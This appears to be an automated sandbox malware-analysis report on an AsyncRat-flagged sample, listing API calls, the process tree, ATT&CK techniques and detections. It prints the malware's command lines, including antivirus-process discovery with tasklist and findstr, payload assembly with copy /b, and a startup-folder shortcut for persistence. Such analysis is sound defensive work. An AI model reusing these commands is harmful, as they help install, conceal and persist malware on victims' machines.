Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00025EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,18_2_00025EDA
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001433B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_001433B7
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifAPI coverage: 4.9 %
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrAPI coverage: 4.6 %
Source: C:\Windows\SysWOW64\findstr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\findstr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\findstr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\findstr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00184005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00184005
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018494A GetFileAttributesW,FindFirstFileW,FindClose,12_2_0018494A
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00183CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00183CE2
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0018C2FF
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018CD14 FindFirstFileW,FindClose,12_2_0018CD14
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_0018CD9F
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0018F5D8
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0018F735
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0018FA36
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00074005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00074005
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_0007494A
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0007C2FF
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007CD14 FindFirstFileW,FindClose,18_2_0007CD14
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_0007CD9F
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0007F5D8
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0007F735
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0007FA36
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00073CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00073CE2
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00135D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00135D13
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\724598\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\724598Jump to behavior
Source: HermesKey.scr, 00000012.00000002.2556635670.0000000001A91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvA7
Source: Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: PkContent.exe, 00000000.00000003.1310781106.0000000000690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ir&Prod_VMware_SATA
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001945D5 BlockInput,12_2_001945D5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00135240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00135240
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00155CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,12_2_00155CAC
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001788CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,12_2_001788CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014A354 SetUnhandledExceptionFilter,12_2_0014A354
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0014A385
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0003A354 SetUnhandledExceptionFilter,18_2_0003A354
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0003A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0003A385
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00179369 LogonUserW,12_2_00179369
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00135240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00135240
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00181AC6 SendInput,keybd_event,12_2_00181AC6
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001851E2 mouse_event,12_2_001851E2
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & echo url="c:\users\user\appdata\local\guardkey solutions\hermeskey.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & exit
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & echo url="c:\users\user\appdata\local\guardkey solutions\hermeskey.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001788CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,12_2_001788CD
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00184F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00184F1C
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002746000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003CFC000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Thermal.pif, HermesKey.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014885B cpuid 12_2_0014885B
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00160030 GetLocalTime,__swprintf,12_2_00160030
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00160722 GetUserNameW,12_2_00160722
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0015416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_0015416A
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: HermesKey.scrBinary or memory string: WIN_81
Source: HermesKey.scrBinary or memory string: WIN_XP
Source: HermesKey.scrBinary or memory string: WIN_XPe
Source: HermesKey.scrBinary or memory string: WIN_VISTA
Source: HermesKey.scrBinary or memory string: WIN_7
Source: HermesKey.scrBinary or memory string: WIN_8
Source: HermesKey.scr.12.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0019696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,12_2_0019696E
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00196E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00196E32
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0008696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,18_2_0008696E
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00086E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,18_2_00086E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
2
Valid Accounts
21
Windows Management Instrumentation
11
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS37
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
111
Masquerading
LSA Secrets41
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials1
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Virtualization/Sandbox Evasion
DCSync4
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem1
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577543 Sample: PkContent.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 92 44 ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz 2->44 46 bg.microsoft.map.fastly.net 2->46 50 Antivirus / Scanner detection for submitted sample 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Sigma detected: Search for Antivirus process 2->54 56 4 other signatures 2->56 10 PkContent.exe 21 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 2 10->15         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 19 HermesKey.scr 12->19         started        process6 file7 40 C:\Users\user\AppData\Local\...\Thermal.pif, PE32 15->40 dropped 48 Drops PE files with a suspicious file extension 15->48 21 Thermal.pif 4 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        29 7 other processes 15->29 signatures8 process9 file10 36 C:\Users\user\AppData\Local\...\HermesKey.scr, PE32 21->36 dropped 38 C:\Users\user\AppData\Local\...\HermesKey.js, ASCII 21->38 dropped 58 Drops PE files with a suspicious file extension 21->58 31 cmd.exe 2 21->31         started        signatures11 process12 file13 42 C:\Users\user\AppData\...\HermesKey.url, MS 31->42 dropped 34 conhost.exe 31->34         started        process14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PkContent.exe63%ReversingLabsWin32.Backdoor.AsyncRat
PkContent.exe100%AviraBDS/Agent.tfscq
PkContent.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr8%ReversingLabs
C:\Users\user\AppData\Local\Temp\724598\Thermal.pif8%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz
    unknown
    unknownfalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://www.autoitscript.com/autoit3/JPkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp, HermesKey.scr, 00000012.00000000.1496285640.00000000000D9000.00000002.00000001.01000000.0000000A.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drfalse
        high
        http://nsis.sf.net/NSIS_ErrorErrorPkContent.exefalse
          high
          https://www.autoitscript.com/autoit3/PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drfalse
            high
            No contacted IP infos
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1577543
            Start date and time:2024-12-18 15:20:50 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 56s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:22
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:PkContent.exe
            Detection:MAL
            Classification:mal92.expl.evad.winEXE@28/14@3/0
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 102
            • Number of non-executed functions: 293
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 20.242.39.171, 20.12.23.50, 23.50.131.216, 23.50.131.200, 13.107.246.63
            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • VT rate limit hit for: PkContent.exe
            TimeTypeDescription
            09:21:50API Interceptor1x Sleep call for process: PkContent.exe modified
            11:19:52API Interceptor3326x Sleep call for process: Thermal.pif modified
            11:20:07API Interceptor2398x Sleep call for process: HermesKey.scr modified
            15:21:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            bg.microsoft.map.fastly.nethttps://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
            • 199.232.214.172
            ji2xlo1f.exeGet hashmaliciousLummaCBrowse
            • 199.232.210.172
            Order_948575494759.xlsGet hashmaliciousUnknownBrowse
            • 199.232.214.172
            DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
            • 199.232.214.172
